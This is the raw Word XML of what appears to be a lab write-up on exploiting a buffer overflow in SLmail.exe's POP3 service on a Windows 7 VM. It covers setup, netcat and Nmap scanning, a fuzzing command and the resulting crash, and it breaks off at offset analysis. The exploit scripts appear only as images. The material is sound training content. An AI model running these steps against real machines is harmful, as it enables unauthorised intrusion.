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0A3C0" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4678">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6456DC95" w14:textId="77777777" w:rsidR="000F062F" w:rsidRPr="00666A7C" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666A7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>When moving data from one location to another the data are stored in the temporary memory location called buffer. The buffer can be overwritten if the volume of the data exceeds the storage capacity of the memory buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="1834412209"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Buf22 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="00B13654">
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00666A7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. The Machine running the program that has the problem of the buffer overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the vulnerable and might be exploited to get the access to the machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00666A7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this scenario, we shall exploit the vulnerability of the SLmail.exe that has the Buffer overflow problem to gain the access on the Windows 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7359262E" w14:textId="77777777" w:rsidR="000F062F" w:rsidRPr="00666A7C" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666A7C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1A9BB0" w14:textId="77777777" w:rsidR="000F062F" w:rsidRPr="00946FEB" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946FEB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kali Linux (attacking machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD374D9" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946FEB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows 7 Machine (victim machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54366E5D" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Slmail.exe file installed in the windows Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4734D534" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mona.py script added into the installation folder of the Immunity Debugger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E4098D" w14:textId="77777777" w:rsidR="000F062F" w:rsidRPr="00946FEB" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Immunity debugger installed on the Window machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574F4202" w14:textId="77777777" w:rsidR="000F062F" w:rsidRPr="00CB4678" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4678">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to Exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A43420" w14:textId="77777777" w:rsidR="000F062F" w:rsidRPr="009669F6" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009669F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Download and set up of the Victim and Attacking Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34706A98" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F"/>
    <w:p w14:paraId="57B6212F" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r w:rsidRPr="00CB4678">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28230BBC" wp14:editId="6385E1B1">
            <wp:extent cx="5943600" cy="2234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4565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0123EB5C" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attacking Machine IP: 192.168.56.141</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A08CF62" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F"/>
    <w:p w14:paraId="1F08CDD4" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r>
        <w:t xml:space="preserve">Go to Windows 7 VM </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCCFA2F" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Download the SLmail.exe from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4678">
        <w:t>https://github.com/shamsherkhan852/Buffer-Overflow-Vulnerable-app/blob/main/SLMail.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A6B171" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Install and run the SLmail.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F22A1F" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run the SLmail.exe as the Administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5346BA95" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Start the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SLMail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> configuration by running it as Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B70BF5E" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r w:rsidRPr="00510078">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22303E8F" wp14:editId="2FDCC612">
            <wp:extent cx="5391902" cy="436305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391902" cy="4363059"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A5FCE" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r w:rsidRPr="00CB4678">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43A77D60" wp14:editId="0B81A7BE">
            <wp:extent cx="5943600" cy="239141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
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2391410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEA0F77" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r>
        <w:t>Command: ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746039D2" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Running the above command, we get the Ip address of the victim machine running SLMail.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A971537" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run the Immunity debugger as administrator </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0115B66D" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attach the SLmail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3904261A" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r w:rsidRPr="00510078">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="080CCBAA" wp14:editId="6DEDEF9A">
            <wp:extent cx="5943600" cy="324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2310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F367741" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F"/>
    <w:p w14:paraId="1789ECAE" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r w:rsidRPr="009E395C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C0DE5A6" wp14:editId="1C2FF124">
            <wp:extent cx="6705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5600" cy="3657600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="214990A0" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attach the SLmail.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3E138F" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After attaching it, it undergoes the paused state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8108B9" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Slmail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is paused. let us run it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47388EC1" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EIP :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E395C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 76F13BFD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is overwritten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC94B04" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r w:rsidRPr="00835490">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7642B1C4" wp14:editId="77AA952D">
            <wp:extent cx="5943600" cy="641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1350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="484FCE8A" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r>
        <w:t>Using Netcat we can find that the victim machine is up and running with the pop3 service Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B3682A" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r w:rsidRPr="00835490">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6629CB9E" wp14:editId="6C75585E">
            <wp:extent cx="6057900" cy="2563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2563495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AFD98A" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r>
        <w:t>By using the Nmap also, we can find the number of ports open including the 110 where the Slmail.exe is listening. This victim machine has number of ports open, that can be used to exploit and gain access on this machine. Let us check for the Buffer overflow vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56396B82" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F"/>
    <w:p w14:paraId="73DE3509" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F"/>
    <w:p w14:paraId="2EA5A02B" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4678">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">uffer </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4678">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ver</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4678">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>low</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB4678">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE5BE1" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13177A71" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Application is downloaded, attached into Immunity Debugger as per above screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C10145" w14:textId="77777777" w:rsidR="000F062F" w:rsidRPr="009E395C" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Let us create the script to see if it can be crashed and find the number of bytes could be used overwrite the EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355A5ABB" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Here is the script let us send it to the victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66578748" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46EDBCB5" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E395C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CCC0488" wp14:editId="69D6D54E">
            <wp:extent cx="6667500" cy="2743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6670356" cy="2744375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="296D46A5" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835490">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71C213EF" wp14:editId="3D83A8AB">
            <wp:extent cx="6657975" cy="2112010"/>
            <wp:effectExtent l="0" t="0" r="9525"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6657975" cy="2112010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="603BE814" w14:textId="77777777" w:rsidR="000F062F" w:rsidRPr="00CA05B2" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA05B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>python2 newfuzzing.py 192.168.56.141 110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754333AF" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA05B2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Around 2700 to 2900 bytes, the application has been crashed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">it is claiming the memory access violation. Since we can crash this application by overwriting it with some bogus data, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>it is clear that the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> application Slmail.exe is vulnerable to the Buffer overflow. Let us check the offset value, this is the exact number of the bytes that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>are able to</w:t>
      </w:r>
